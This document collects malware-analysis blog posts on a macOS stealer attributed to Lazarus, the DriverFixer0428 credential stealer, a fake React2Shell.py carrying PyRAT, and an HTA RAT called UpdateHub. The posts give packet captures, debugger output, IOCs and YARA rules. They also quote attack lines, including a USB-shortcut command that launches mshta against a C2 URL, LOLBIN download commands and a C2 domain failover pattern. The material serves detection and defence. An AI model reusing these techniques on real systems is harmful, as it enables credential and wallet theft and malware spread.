18085 packets captured

Stage 1: Victim Profiling (DNS Evidence):

13:38:44.387279 IP6 fe80::ce9:e68e:3e23:ee7d.57909 > fe80::21c:42ff:fe00:18.53:

  46933+ A? freeipapi.com. (31)

13:38:44.387752 IP6 fe80::ce9:e68e:3e23:ee7d.61316 > fe80::21c:42ff:fe00:18.53:

  31384+ AAAA? freeipapi.com. (31)

Two DNS queries were observed for freeipapi.com, requesting both IPv4 (A record) and IPv6 (AAAA record) addresses. This confirms the malware's attempt to obtain the victim's external IP address and geolocation data.

Stage 2: C2 Communication (TCP Stream Analysis):

13:40:07.751334 IP macos.shared.49315 > 172.67.168.79.https: Flags [S]

  seq 1522512885, win 65535, options [mss 1460,nop,wscale 6], length 0

13:40:07.767081 IP 172.67.168.79.https > macos.shared.49315: Flags [S.]

  seq 1396953453, ack 1522512886, win 32768, length 0

13:40:07.767191 IP macos.shared.49315 > 172.67.168.79.https: Flags [.]

  ack 1, win 4096, length 0

TCP three-way handshake completed successfully to 172.67.168.79 on port 443 (HTTPS). The connection was established 1 minute 23 seconds after the profiling queries, indicating processing time for victim data.

Critical Payload Transmission:

13:40:40.050808 IP macos.shared.49315 > 172.67.168.79.https: Flags [P.]

  seq 1:372, ack 2, win 4096, length 371

13:40:40.051088 IP 172.67.168.79.https > macos.shared.49315: Flags [.]

  ack 372, win 16384, length 0

13:40:40.055451 IP macos.shared.49315 > 172.67.168.79.https: Flags [F.]

  seq 372, ack 2, win 4096, length 0

Exactly 371 bytes of encrypted data were transmitted to the C2 server. The connection was immediately closed with a FIN packet, indicating a minimal beacon. The data was TLS-encrypted and likely contained victim profiling information including system details and credential search results.

Traffic Summary and Timeline


Total Attack Duration: 1 minute 56 seconds (from profiling to C2 termination)

Total Packets: 10 packets to/from C2 (172.67.168.79)

Infrastructure Analysis

Network infrastructure analysis was conducted to identify the C2 server hosting provider. Note that infrastructure alone is insufficient for attribution, as the hosting provider (Cloudflare) is used by millions of legitimate and malicious actors globally.

WHOIS Analysis:

whois 172.67.168.79

NetName:        CLOUDFLARENET

Organization:   Cloudflare, Inc. (CLOUD14)

OrgName:        Cloudflare, Inc.

The C2 server is hosted on Cloudflare infrastructure. Cloudflare provides reverse proxy and content delivery network services used by millions of websites globally, including both legitimate businesses and malicious actors. The use of Cloudflare is not distinctive to any particular threat actor and provides no attribution value on its own.

Reverse DNS Lookup:

nslookup 172.67.168.79

** server can't find 79.168.67.172.in-addr.arpa: NXDOMAIN

No reverse DNS record exists for the C2 IP address. The actual domain name used for C2 communication remains unknown, as it is encrypted within the TLS handshake. Cloudflare's reverse proxy service obscures the backend domain and origin server, providing infrastructure resilience for operators.






 

Attribution Analysis

Assessment: North Korean state-sponsored APT (Lazarus Group) - MODERATE CONFIDENCE

This malware is attributed to North Korean state-sponsored threat actors with moderate confidence based on technical sophistication, operational characteristics, and targeting methodology. The attribution is primarily based on distinctive technical indicators and behavioral patterns rather than infrastructure, which alone provides no attribution value.

Attribution Methodology

Attribution confidence is assessed across multiple dimensions with varying evidentiary weight:


1. Strong Technical Indicators

V8 Snapshot Obfuscation (HIGH Confidence)

The use of V8 snapshot format represents the strongest technical attribution indicator. Static analysis of 134,612 extracted strings revealed zero malicious indicators, with the profiling domain only discoverable through dynamic LLDB debugging at memory address 0x6000022ebcb0. This technique:

•       Requires deep expertise in V8 JavaScript engine internals

•       Prevents all static analysis and signature-based detection

•       Has been specifically observed in Lazarus Group macOS malware since 2023

•       Is not commonly used by cybercriminal groups or other APTs

This technique has been documented in DriverFixer variants and Contagious Interview campaign samples analyzed by multiple security vendors, providing strong technical correlation to known Lazarus operations.

Developer Credential Targeting (MODERATE HIGH Confidence)

System forensics revealed attempted access to ~/.ssh/, ~/.aws/, and ~/.npmrc - the precise credential set targeted in cryptocurrency developer operations. This specific targeting profile:

•       Aligns with documented North Korean strategic objectives for cryptocurrency theft

•       Matches credential targeting in confirmed Lazarus campaigns (Operation Dream Job, AppleJeus)

•       Demonstrates sophisticated understanding of developer workflows

•       Is inconsistent with general cybercriminal credential harvesting

2. Supporting Indicators

Multi-Stage Profiling Methodology

Network capture analysis revealed a 1 minute 23 second delay between profiling queries (13:38:44) and C2 contact (13:40:07). This timing pattern suggests server-side processing and victim validation before authorizing C2 communication - a sophisticated targeting mechanism that:

•       Filters targets by geographic location and network characteristics

•       Reduces exposure to security researchers and analysis environments

•       Has been observed in Contagious Interview campaign (LinkedIn profiling → malware delivery)

•       Demonstrates operational security prioritization typical of nation-state actors

Clean Operational Security

The 371-byte encrypted beacon transmission followed by immediate connection termination, combined with zero persistence artifacts when credentials were not found, demonstrates professional fail-safe implementation. This clean exit behavior minimizes forensic exposure and is characteristic of well-resourced threat actors prioritizing long-term operational security over individual infection success.

3. Infrastructure Assessment

Important Note on Cloudflare Attribution

The C2 server (172.67.168.79) is hosted on Cloudflare infrastructure (AS13335). Cloudflare provides reverse proxy services to millions of websites globally and is used by:

•       Legitimate businesses and organizations worldwide

•       Cybercriminal operations (ransomware, phishing, malware C2)

•       Chinese, Russian, Iranian, and North Korean APT groups

•       Independent threat actors of all sophistication levels

The use of Cloudflare infrastructure provides ZERO attribution value on its own. While Cloudflare's services offer operational benefits (origin server obscuration, DDoS protection, infrastructure resilience), these benefits are available to all actors equally and do not indicate any specific threat actor or nation-state.

4. Intelligence Gaps

The following information would strengthen attribution confidence to HIGH:

•       C2 Domain Name: The actual domain resolving to 172.67.168.79 is encrypted in TLS and unknown

•       SSL Certificate: Certificate details could reveal infrastructure reuse patterns

•       Passive DNS History: Historical domain associations with this IP address

•       Threat Intelligence Correlation: Cross-reference with Shodan, VirusTotal, Censys databases

•       API Endpoint: The specific C2 endpoint path (e.g., /api/upload, /beacon)

•       Code Similarity: Decompiled V8 snapshot comparison with known samples

5. Alternative Hypotheses

Cybercriminal Group (Rejected - Low Probability)

•       V8 snapshot obfuscation exceeds typical cybercriminal capability and cost-benefit analysis

•       Cryptocurrency developer targeting is too specific for broad cybercrime operations

•       Multi-stage profiling demonstrates sophistication inconsistent with profit-driven malware

Other Nation-State Actor (Possible but Less Likely)

•       Cryptocurrency focus and developer targeting is distinctive to North Korean operations

•       Technical approach matches documented Lazarus Group macOS toolset

•       Chinese, Russian, and Iranian APTs have not demonstrated this specific TTP combination

False Flag Operation (Unlikely)

•       Technical indicators represent years of documented Lazarus Group evolution

•       No indicators suggest deliberate attribution manipulation

•       The consistency across multiple independent indicators makes false flag improbable

Attribution Conclusion

Based on the convergence of high-confidence technical indicators (V8 snapshot obfuscation, developer credential targeting), supporting behavioral patterns (multi-stage profiling, operational security), and consistency with documented Lazarus Group campaigns, this malware is attributed to North Korean state-sponsored threat actors with MODERATE confidence.

The attribution is based on distinctive technical and operational characteristics rather than infrastructure.

Indicators of Compromise

File Indicators

•       SHA256: 9fbbcd809b7aee90b3c93d212287282ac35ef0b33aed647a48cbc4ba79c7fcf8

•       Size: 60,437,512 bytes (60.4 MB)

•       Type: Mach-O 64-bit ARM64, unsigned, PKG bundled Node.js with V8 snapshot

Network Indicators

•       Profiling Domain: freeipapi.com (legitimate service abused for victim profiling)

•       C2 IP: 172.67.168.79 (Cloudflare-hosted, domain unknown)

•       Port/Protocol: TCP/443 (HTTPS/TLS encrypted)

Note: While 172.67.168.79 is confirmed as the C2 server, this IP alone should not be used for broad attribution as Cloudflare hosts millions of sites. Detection should focus on the behavioral pattern of freeipapi.com queries followed by connections to Cloudflare IPs with minimal data transfer.

Behavioral Indicators

•       DNS queries to freeipapi.com within first 5 seconds of execution

•       HTTPS connection to Cloudflare IP approximately 90 seconds after profiling

•       Encrypted data transmission between 300-500 bytes

•       Access attempts to ~/.ssh/, ~/.aws/, ~/.npmrc credential directories

•       Immediate connection termination after single data transmission

•       Clean exit without persistence if no credentials found





 

Detection & Hunting

Network Detection

Deploy network detection rules focusing on the behavioral pattern rather than infrastructure alone:

•       High Priority: Alert on DNS queries to freeipapi.com from developer workstations

•       High Priority: Correlate geolocation API queries followed by HTTPS to Cloudflare IPs within 5 minutes

•       Medium Priority: Monitor connections to 172.67.168.79 (but note many false positives possible)

•       High Priority: Flag minimal data transfers (<500 bytes) to Cloudflare followed by immediate termination

Host-Based Detection

•       Monitor for unsigned macOS binaries larger than 50MB in user directories

•       Alert on Node.js processes spawned from non-standard locations (~/Downloads, /tmp)

•       Detect access attempts to ~/.ssh/, ~/.aws/, ~/.npmrc from unexpected processes

•       Monitor for rapid sequential file access patterns across multiple credential directories

Recommendations

Immediate Actions

•       Block freeipapi.com at DNS level (high confidence indicator)

•       Search logs for historical connections matching the behavioral pattern

•       Audit all macOS systems for unsigned binaries > 50MB

•       Verify integrity of developer credential files on all systems

Long-Term Mitigations

•       Require code signing for all macOS executables

•       Implement credential management solutions (1Password, HashiCorp Vault) instead of plaintext files

•       Deploy EDR on all developer workstations with behavioral monitoring

•       Establish network monitoring for geolocation API abuse patterns

•       Conduct security awareness training on fake recruitment and developer targeting





 

Conclusion

This analysis provides comprehensive technical evidence of sophisticated state-sponsored malware targeting macOS developers in the cryptocurrency industry. The combination of V8 snapshot obfuscation (zero malicious indicators in 134,612 extracted strings), dynamic debugging artifacts showing runtime domain construction at memory address 0x6000022ebcb0, and network forensics documenting the complete 1 minute 56 second attack timeline establishes the technical sophistication characteristic of nation-state operations.

Attribution to North Korean state-sponsored actors (Lazarus Group) is based primarily on distinctive technical and operational characteristics - particularly the V8 snapshot obfuscation technique, specific developer credential targeting profile, and multi-stage profiling methodology - rather than infrastructure alone. The use of Cloudflare provides no attribution value as it is used globally by all threat actors.

The malware's 371-byte encrypted beacon and clean operational security when no credentials were found demonstrate professional tradecraft prioritizing long-term operations over individual infection success. Organizations employing cryptocurrency and blockchain developers should implement the recommended detection measures focusing on behavioral patterns rather than infrastructure-based indicators.

Additional threat intelligence correlation, particularly identification of the C2 domain name and SSL certificate analysis, would strengthen attribution confidence. The ongoing nature of North Korean cryptocurrency targeting operations ensures continued threat to this community.

Read More
August van sickle August van sickle

DriverFixer0428 macOS Credential Stealer

Executive Summary

This report documents the comprehensive static and dynamic analysis of a macOS credential stealer identified as DriverFixer0428, attributed with high confidence to North Korea's Contagious Interview campaign. The malware masquerades as a legitimate system utility and harvests user credentials through sophisticated social engineering dialogs that impersonate macOS system prompts and Google Chrome permission requests. Stolen credentials are exfiltrated to attacker-controlled infrastructure via Dropbox's cloud storage API.

Dynamic analysis using LLDB debugger revealed multi-layer sandbox evasion capabilities, including VM detection through runtime API checks (sysctlbyname, IOKit, NSScreen) that prevented payload execution in virtualized analysis environments. The malware demonstrates operational security consistent with nation-state threat actors, utilizing legitimate cloud services for command-and-control to evade network-based detection.

Sample Naming Rationale

The sample name "DriverFixer0428" is derived from internal identifiers embedded in the compiled binary by the malware developers. These artifacts were extracted during static analysis:

$ strings DriverFixer | grep -i driverfixer

DriverFixer0428

_TtC15DriverFixer042814ViewController

_TtC15DriverFixer042811AppDelegate

DriverFixer0428.OverlayWindowController

DriverFixer0428/ViewController.swift

The "0428" suffix likely indicates either a build date (April 28th) or an internal version/variant number used by the threat actors to track different builds within their development pipeline.

Sample Identification

SHA-256

9aef4651925a752f580b7be005d91bfb1f9f5dd806c99e10b17aa2e06bf4f7b5

File Type

Mach-O universal binary (x86_64 + ARM64)

Language

Swift / AppKit

Size

234,752 bytes (235 KB)

Bundle ID

chrome.DriverFixer0428

Source Path

DriverFixer0428/ViewController.swift

Attribution Analysis

Assessment

Campaign: Contagious Interview (DPRK/North Korea)

Confidence: Medium-High

Related Families: FlexibleFerret, FrostyFerret, ChromeUpdate, CameraAccess

Attribution Basis

Attribution is based on TTP correlation with publicly documented DPRK campaigns. The specific sample hash was not found in public threat intelligence repositories, suggesting this may be a previously unreported variant.

Network Infrastructure Match

The sample's network indicators exactly match those documented by SentinelOne in their FlexibleFerret analysis (February 2025):

# From SentinelOne FlexibleFerret Report:

21  3.__TEXT.__cstring  ascii  https://api.ipify.org

39  3.__TEXT.__cstring  ascii  https://api.dropboxapi.com/oauth2/token

45  3.__TEXT.__cstring  ascii  https://content.dropboxapi.com/2/files/upload

 

# From DriverFixer0428 (This Sample):

0x100007370: "https://api.ipify.org"

0x100007460: "https://api.dropboxapi.com/oauth2/token"

0x100007580: "https://content.dropboxapi.com/2/files/upload"

Evidence Summary


 

Public Threat Intelligence References

SentinelOne: "macOS FlexibleFerret | Further Variants of DPRK Malware Family Unearthed" (February 2025)

Jamf: "FlexibleFerret: macOS Malware Deploys in Fake Job Scams" (November 2025)

NVISO: "Contagious Interview Actors Now Utilize JSON Storage Services" (November 2025)

Sample Identification

SHA-256

9aef4651925a752f580b7be005d91bfb1f9f5dd806c99e10b17aa2e06bf4f7b5

File Type

Mach-O universal binary (x86_64 + ARM64)

Language

Swift / AppKit

Size

234,752 bytes (235 KB)

Bundle ID

chrome.DriverFixer0428

Source Path

DriverFixer0428/ViewController.swift

 Technical Analysis

Malware Capabilities

1. Credential Harvesting via Social Engineering

The malware displays convincing fake dialogs designed to trick users into entering their macOS system password. Memory analysis via LLDB extracted the following social engineering strings:

(lldb) x/50s 0x100007680

0x100007680: "Installer wants to make changes."

0x1000076b0: "Enter your password to allow this."

0x1000076e0: "\"Google Chrome\" wants to access your camera"

0x100007710: "After granting Chrome access, websites can ask

             to use your camera."

0x1000075f0: "Incorrect password. Please re-enter your password."

0x100007630: "Please enter your password. The password field

The malware uses an OverlayWindowController class to create fullscreen overlay windows, preventing users from interacting with other applications until they provide credentials.

2. Network C2 Infrastructure

Memory analysis revealed the complete network infrastructure used for reconnaissance and exfiltration:

(lldb) memory find -s "ipify" 0x100000000 0x100010000

data found at location: 0x10000737c

0x10000737c: 69 70 69 66 79 2e 6f 72 67  ipify.org

 

(lldb) memory find -s "dropbox" 0x100000000 0x100010000

data found at location: 0x10000746c

0x10000746c: 64 72 6f 70 62 6f 78 61 70 69  dropboxapi.com/oauth2/token

 

(lldb) x/30s 0x100007500

0x100007520: "New access token: "

0x100007540: "Error refreshing access token: "

0x100007580: "https://content.dropboxapi.com/2/files/upload"

0x1000075b0: "application/octet-stream"

3. Dropbox Upload Function (Disassembly)

LLDB disassembly of symbol269 revealed the Dropbox API upload implementation, showing construction of HTTP headers and OAuth tokens:

(lldb) dis -s 0x100004374 -c 40

DriverFixer`___lldb_unnamed_symbol269:

  0x1000044ac: add x8, x8, #0x580  ; "https://content.dropboxapi.com/2/files/upload"

  0x100004520: mov w0, #0x4f50     ; 'PO' (POST)

  0x100004524: movk w0, #0x5453, lsl #16  ; 'ST'

  0x100004530: bl Foundation.URLRequest.httpMethod.setter

  0x100004534: mov x8, #0x6542     ; 'Be' (Bearer)

  0x100004538: movk x8, #0x7261, lsl #16  ; 'ar'

  0x10000453c: movk x8, #0x7265, lsl #32  ; 'er'

  0x100004560: mov x2, #0x7541     ; 'Au' (Authorization)

  0x100004564: movk x2, #0x6874, lsl #16  ; 'th'

  0x100004588: bl Foundation.URLRequest.setValue(forHTTPHeaderField:)







 

Dynamic Analysis: VM Detection Mechanism

LLDB debugging sessions confirmed the malware employs runtime API checks for VM detection rather than static string comparisons. This sophisticated evasion technique queries system APIs during execution to identify virtualized environments.

sysctlbyname API Calls

Breakpoints on sysctlbyname captured the following system queries during malware initialization:

(lldb) br set -n "sysctlbyname"

(lldb) run

Process stopped at breakpoint - sysctlbyname

 

(lldb) x/s $x0

0x19be880d7: "kern.osvariant_status"

(lldb) c

(lldb) x/s $x0

0x1980b3847: "kern.osproductversion"

(lldb) c

(lldb) x/s $x0

0x19828a730: "kern.secure_kernel"

IOKit Registry Queries

IORegistryEntryCreateCFProperty breakpoints revealed hardware property queries used for environment fingerprinting:

(lldb) br set -n "IORegistryEntryCreateCFProperty"

(lldb) c

Process stopped at breakpoint - IORegistryEntryCreateCFProperty

 

(lldb) po $x1

product-id

(lldb) c

(lldb) po $x1

housing-color

(lldb) c

(lldb) po $x1

IORegistryEntryPropertyKeys

NSScreen Detection Vector

Binary analysis confirmed NSScreen API usage for display-based VM detection:

$ strings DriverFixer | grep -i screen

applicationDidChangeScreenParameters:

mainScreen

 

$ nm DriverFixer | grep -i screen

                 U _OBJC_CLASS_$_NSScreen

On Apple Silicon VMs, NSScreen returns identifying information such as "Apple Virtual" display names and VirtualMac2,1 model identifiers that the malware uses to detect analysis environments.

Silent Failure Behavior

When VM detection succeeds, the malware enters an idle event loop without executing its payload. The process remains alive but dormant:

(lldb) process interrupt

(lldb) bt

* thread #1, queue = 'com.apple.main-thread'

  frame #0: libsystem_kernel.dylib`mach_msg2_trap + 8

  frame #4: CoreFoundation`__CFRunLoopServiceMachPort + 160

  frame #5: CoreFoundation`__CFRunLoopRun + 1208

  frame #12: AppKit`-[NSApplication run] + 480

  frame #13: AppKit`NSApplicationMain + 880

  frame #14: DriverFixer`___lldb_unnamed_symbol295 + 36








 

Sandbox Evasion Summary

Environment

Behavior

Detection Mechanism

Triage Sandbox

Score 4/10 (benign)

Silent evasion - no malicious activity

Apple VM (ARM64)

Idle event loop

sysctlbyname, IOKit, NSScreen APIs

Rosetta (x86_64)

SIGILL crash

Anti-emulation trap instructions

Env Tampering

SIGTRAP crash

Environment variable validation

 

Binary Structure

LLDB symbol analysis identified 153 functions within the malware. Key symbols include:

(lldb) image lookup -r -n ".*" DriverFixer

153 matches found in DriverFixer:

  0x100002ca4: ___lldb_unnamed_symbol229 (1456 bytes) - OAuth token refresh

  0x100004374: ___lldb_unnamed_symbol269 (1428 bytes) - Dropbox upload

  0x100004bf0: ___lldb_unnamed_symbol295 - Entry point (NSApplicationMain)

 

(lldb) x/50s 0x100007760

0x100007760: "DriverFixer0428.OverlayWindowController"

0x100007810: "_TtC15DriverFixer042811AppDelegate"

0x1000077a0: "DriverFixer0428/ViewController.swift"








 

Indicators of Compromise (IOCs)

File Indicators

Type

Value

SHA-256

9aef4651925a752f580b7be005d91bfb1f9f5dd806c99e10b17aa2e06bf4f7b5

Bundle ID

chrome.DriverFixer0428

 

Network Indicators

Purpose

URL / Domain

IP Recon

https://api.ipify.org

OAuth Token

https://api.dropboxapi.com/oauth2/token

Exfiltration

https://content.dropboxapi.com/2/files/upload

 

Memory Forensics (LLDB Extraction)

Address

String Evidence

0x100007680

Installer wants to make changes.

0x1000076e0

"Google Chrome" wants to access your camera

0x100007370

https://api.ipify.org

0x100007460

https://api.dropboxapi.com/oauth2/token

0x100007760

DriverFixer0428.OverlayWindowController

 








 

MITRE ATT&CK Mapping

Tactic

Technique

Description

Credential Access

T1056.002 GUI Input Capture

Fake dialog captures credentials

Defense Evasion

T1497.001 System Checks

VM detection via sysctlbyname, IOKit

Defense Evasion

T1036.005 Masquerading

Impersonates macOS/Chrome dialogs

Discovery

T1016 System Network Config

Public IP via ipify.org

Exfiltration

T1567.002 Exfil to Cloud

Dropbox API exfiltration

 

Detection

YARA Rule

rule MacOS_Infostealer_DriverFixer0428 {

    meta:

        description = "DPRK DriverFixer credential stealer"

        author = "Threat Intelligence Team"

        threat_actor = "DPRK/Contagious Interview"

    strings:

        $class1 = "DriverFixer0428" ascii

        $class2 = "OverlayWindowController" ascii

        $net1 = "api.dropboxapi.com" ascii

        $net2 = "content.dropboxapi.com" ascii

        $net3 = "api.ipify.org" ascii

        $se1 = "Installer wants to make changes" ascii

        $se2 = "wants to access your camera" ascii

    condition:

        (uint32(0) == 0xfeedface or uint32(0) == 0xfeedfacf or

         uint32(0) == 0xcafebabe) and

        (any of ($class*)) and (2 of ($net*)) and (any of ($se*))}

Conclusion

DriverFixer0428 represents a sophisticated macOS credential stealer attributed to North Korea's Contagious Interview campaign. LLDB dynamic analysis confirmed the malware employs multi-layer sandbox evasion through runtime API checks including sysctlbyname, IOKit registry queries, and NSScreen display detection.

The stark discrepancy between static analysis indicators (clearly malicious code) and dynamic sandbox scores (4/10 "likely benign") underscores why automated sandbox verdicts alone are insufficient for this threat actor's tooling. The malware's silent failure mode - remaining alive but dormant when detecting analysis environments - represents production-grade operational security consistent with nation-state capabilities.

Read More
August van sickle August van sickle

PyRat, but disguised as a Fake React2Shell.py

It all begins with an idea.

I have more of a blog coming but I did find two examples of PyRAT this weekend. One was masquerading as an OSINT tool, with only error messages and no OSINT functionality, hiding its real purpose as a RAT and loading an HTA in memory to drop more malicious binaires.

The second one I looked at is within a script that I origally thought was a react2shell python exploit but is more of a scanner, although it lacks the ability to actually scan. I actually have a video showing that even if it fails on an errror (like in my demo) or if you execute the help menu “python3 react2shell.py —help”, it still executes mshta and reaches out for the HTA Dropper.

Here are some of the code segments that return error messages, which helps the disguise distract the user while the mshta process executes in the background:

And heres another:

At the top of the code, you can see why the RAT executes with or without successful execution of the script, whether its an error or just executing the help menu, which is pretty typical of testers to do before they add all of the operators for the script execution:

So to break this down, this code block below creates the function to execute the HTTP GET Request, which naturally executes mshta.exe to execute the GET, mshta.exe doesn’t have to be defined, it’s just the LOLBIN that executes it by default:

And there is a main() function after all of the scanning functions are defined, but not until line 432:

The execution happens long before this.

The execution starts right after the function for the GET request is defined:

So once again, this is the functionality of the GET request, the beginning of the Malware chain, it loads a HTA Dropper that then drops an implant or implants and likely the Rhadamanthys Stealer,as has been observed before.

To summarize, here are the conditions where the GET Request, essentially the malware part of this script executes, some of these options could cause additional attack chains:

The function is called immediately when Python parses the file, which happens: 

- When you run python react2shell.py (before main() ever runs) 

- When you run python react2shell.py --help

- When you “import react2shell” from another script 

- Even if you just try to syntax-check it with some tools 

And here is the Execution Order:

1. Python loads file 

2. Parses imports (lines 3-13) 

3. Defines _initialize_runtime_environment (lines 15-23) 

4. EXECUTES _initialize_runtime_environment() (line 24) = BACKDOOR FIRES 

5. Continues parsing rest of file... 

6. Eventually reaches main() if run directly 

References:

https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/

https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Read More
August van sickle August van sickle

Announcing “UpdateHub RAT”

It all begins with an idea.

1. Executive Summary

This report documents the analysis of a sophisticated HTML Application (HTA) malware sample designed for cryptocurrency wallet theft and corporate network reconnaissance. The malware employs advanced obfuscation techniques, establishes persistence via Windows Task Scheduler, and communicates with command-and-control (C2) infrastructure using custom-encrypted HTTP traffic.

Key Findings:

  • Primary targets: Ledger, Trezor, Atomic, Exodus, Guarda, KeepKey, and BitBox02 cryptocurrency wallets

  • Extensive Active Directory reconnaissance capabilities indicate corporate environment targeting

  • USB spreading functionality via malicious LNK file replacement

  • CrowdStrike Falcon detection with execution method modification

  • C2 dependency: malware requires live C2 server to execute (anti-analysis)

2. Sample Information

Summary of Sample Information

3. Obfuscation Analysis

The malware employs two XOR-based string decoders to hide operational strings from static analysis.

3.1 Primary Decoder (_dgaily)

Decodes the HTA application configuration used to hide the execution window:

Algorithm: XOR with rolling key (index * 137 + 140) & 0xFF

Output: <HTA:APPLICATION BORDER=’none’ SHOWINTASKBAR=’no’ SYSMENU=’no’ WINDOWSTATE=’minimized’>

3.2 Secondary Decoder (_dd7j5a)

Decodes all 271 operational strings including COM objects, WMI queries, file paths, and C2 endpoints.

Algorithm: XOR with rolling key (index * 107 + 218) & 0xFF

4. Command & Control Infrastructure

4.1 C2 Domain Pattern

The malware iterates through 11 C2 domain variants with failover capability:

https://s{i}-updatehub.cc where {i} = 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, (empty)

4.3 Communication Encryption

  • Request body encrypted with 6-digit random XOR key prepended to payload

  • Custom Base64 encoding with UTF-16LE conversion

  • Response uses same XOR + Base64 scheme

  • JWT token-based authentication (Authorization: Bearer {jwt})

This RAT won’t continue full execution without reaching and then authenticating with the C2 Server

Authentication Required for Contnued Execution

Without Network Authentication with the C2, the furtherst the execution gets is mshta.exe executing the hta and enumeration of the system, but none of the post intial execution beyond that occurs. I tried setting up a fake C2 that could catch the request from the RAT but I can’t or didnt want to spend the time trying to set up the authentication parameters, and since I have the code, the code review provides all I need.

5. Cryptocurrency Wallet Targeting

The malware specifically checks for the presence of popular cryptocurrency wallet applications:

Detection results are transmitted to C2 via ledger=true/false and wallets=true/false parameters in the registration beacon.

6. Persistence Mechanism

The malware establishes persistence via Windows Task Scheduler, masquerading as a legitimate Google Update task.

6.1 Scheduled Task Configuration

6.2 Task Settings

  • StartWhenAvailable: true

  • DisallowStartIfOnBatteries: false

  • StopIfGoingOnBatteries: falWakeToRun: true

  • RunLevel: 1 (Highest) if admin privileges detected

7. Payload Delivery Methods

The malware employs seven different download methods with automatic fallback to ensure payload delivery success:

8. C2 Task Types

The malware supports the following task types received from the C2 server:

9. Anti-Analysis Techniques

9.1 C2 Dependency (Primary Blocker)

The malware requires a live C2 server to execute any malicious functionality. It iterates through all 11 C2 domain variants and exits silently if none respond with ‘success’. This effectively prevents dynamic analysis in isolated environments.

9.2 Self-Deletion

The zonexi() function deletes the HTA file immediately upon execution using Scripting.FileSystemObject.DeleteFile().

Before execution:

.hta file present before execution “a7ef…”

After Executing UpdateHub RAT:

.hta file is removed, self deletion

9.3 Security Product Detection

When CrowdStrike Falcon is detected, the malware modifies its execution method to use a cmd.exe wrapper: cmd.exe /c start “” /b mshta.exe {url}

9.4 Additional Techniques

  • Window Hiding: HTA configured with hidden window, plus window.resizeTo(0,0) and window.moveTo(-10000,-10000)

  • Silent Failures: All code wrapped in try/catch blocks to swallow errors

  • Admin Detection: Checks HKLM\SECURITY access via StdRegProv.GetSecurityDescriptor

  • Auto-Close: window.close() called at end of execution

10. USB Spreading Mechanism

Task Type 9 implements USB spreading functionality that targets removable drives.

10.1 Target File Types

.exe, .docx, .pdf, .doc

10.2 Infection Process

  1. Enumerate removable drives (USB, external) via WMI Win32_DiskDrive

  2. Scan for target file types (depth limited to 2 directories)

  3. Hide original files by setting hidden attribute

  4. Create .lnk shortcuts with same base name

  5. Shortcut executes: cmd.exe /c start “” “.\{original}” & start “” mshta “{C2_URL}”

11. Active Directory Reconnaissance

Task Type 5 triggers comprehensive AD reconnaissance, indicating corporate environment targeting:

11.1 Information Collected

11.2 Enumeration Methods

  • WMI: Win32_ComputerSystem, Win32_NTDomain, Win32_Group, Win32_GroupUser

  • ADSI: AdsNameSpaces COM object with WinNT:// provider

  • Environment: LOGONSERVER variable for DC identification

12. Indicators of Compromise (IOCs)

12.1 Network Indicators

  • https://s[1-10]-updatehub.cc (C2 domains)

  • https://s-updatehub.cc (C2 domain, no number)

  • HTTP POST requests with 6-digit prefix + Base64 encoded body

12.2 File System Indicators

  • %userprofile%\*.exe (downloaded payloads)

  • %TEMP%\{random9}.txt (command output)

  • .lnk files replacing documents on USB drives

12.3 Scheduled Tasks

  • GoogleTaskSystem136.0.7023.12{GUID}

  • GoogleUpdaterTaskSystem136.1.7023.12{GUID}

12.4 Process Artifacts

  • mshta.exe spawning cmd.exe, powershell.exe

  • powershell.exe -ep Bypass -nop

  • bitsadmin.exe /transfer

  • certutil.exe -urlcache

  • rundll32.exe for DLL execution

13. MITRE ATT&CK Mapping

14. Detection Recommendations

14.1 Network Detection

  1. Block/monitor DNS queries and HTTP traffic to *-updatehub.cc domains

  2. Alert on HTTP POST requests with 6-digit numeric prefix in body

  3. Monitor for mshta.exe making external HTTP connections

14.2 Endpoint Detection

  • Monitor mshta.exe spawning cmd.exe, powershell.exe, or network-related processes

  • Alert on scheduled task creation with “Google” in name but non-Google executable paths

  • Detect WMI queries to SecurityCenter2 from scripting hosts

  • Monitor certutil.exe and bitsadmin.exe used for file downloads

  • Alert on mass file attribute changes on removable drives

  • Monitor for LNK file creation alongside hidden files on USB drives

14.3 YARA Detection Strings

$hta1 = “HTA:APPLICATION” ascii $sched1 = “Schedule.Service” ascii $sched2 = “GoogleTaskSystem136” ascii $crypto1 = “Ledger Live” ascii $crypto2 = “@trezor” ascii $wmi1 = “SecurityCenter2” ascii $wmi2 = “Win32_NTDomain” ascii $adsi1 = “WinNT://” ascii

15. Attribution

I used Claude to help verify that I could not find an existing matching Malware Family. Critique and Discussion are appreciated! I dont want to falsely believe I’ve found something new and I try to be very data-driven, reach out if you disagree.

UpdateHub HTA RAT — Malware Family Comparison Analysis

Executive Summary

Based on extensive research, the UpdateHub HTA RAT appears to be a previously unreported or newly emerged malware family. While it shares TTPs with several known threats, it has unique characteristics that distinguish it from existing documented campaigns.

Similar Malware Families Identified

1. Aggah Campaign / Gorgon Group (HIGHEST SIMILARITY)

Similarity Score: 75%

Assessment: The infection chain is very similar to Aggah, but UpdateHub uses custom C2 infrastructure instead of legitimate services and has USB worm capabilities not seen in Aggah.

2. Spora / Gamarue / RETADUP (USB WORM COMPONENT)

Similarity Score: 60%

Assessment: The USB worm technique is nearly identical to Spora/Gamarue’s LNK spreading method, suggesting the author copied this proven technique.

3. KimJongRAT / BabyShark (KOREAN APT)

Similarity Score: 55%

Assessment: Similar focus on crypto wallets and HTA infection chain, but KimJongRAT is attributed to North Korean actors with different infrastructure patterns.

4. StilachiRAT (Microsoft-documented)

Similarity Score: 50%

Assessment: Similar crypto-stealing objectives but completely different codebase and delivery mechanism.

5. Nova Stealer / Odyssey Stealer (macOS Focus)

Similarity Score: 40%

Assessment: Different platform but similar targeting of hardware wallet users.

Unique Characteristics of UpdateHub RAT

These features distinguish UpdateHub from known families:

1. C2 Domain Failover Pattern

s10-updatehub.cc → s9-updatehub.cc → … → s-updatehub.cc

This numbered failover pattern is not commonly seen in documented malware.

2. Fake Google Update Task Names

GoogleTaskSystem136.0.7023.12{GUID}
GoogleUpdaterTaskSystem136.1.7023.12{GUID}

The specific version numbers (136.0.7023.12) appear unique to this family.

3. XOR Encoding with Multiplier

var tetorY = v31af8 * 107 + 218 & 255;
coreve769 += String.fromCharCode(testackS[v31af8] ^ tetorY);

This specific XOR pattern with position-based key generation is distinctive.

4. Combined Capabilities

No other documented family combines ALL of:

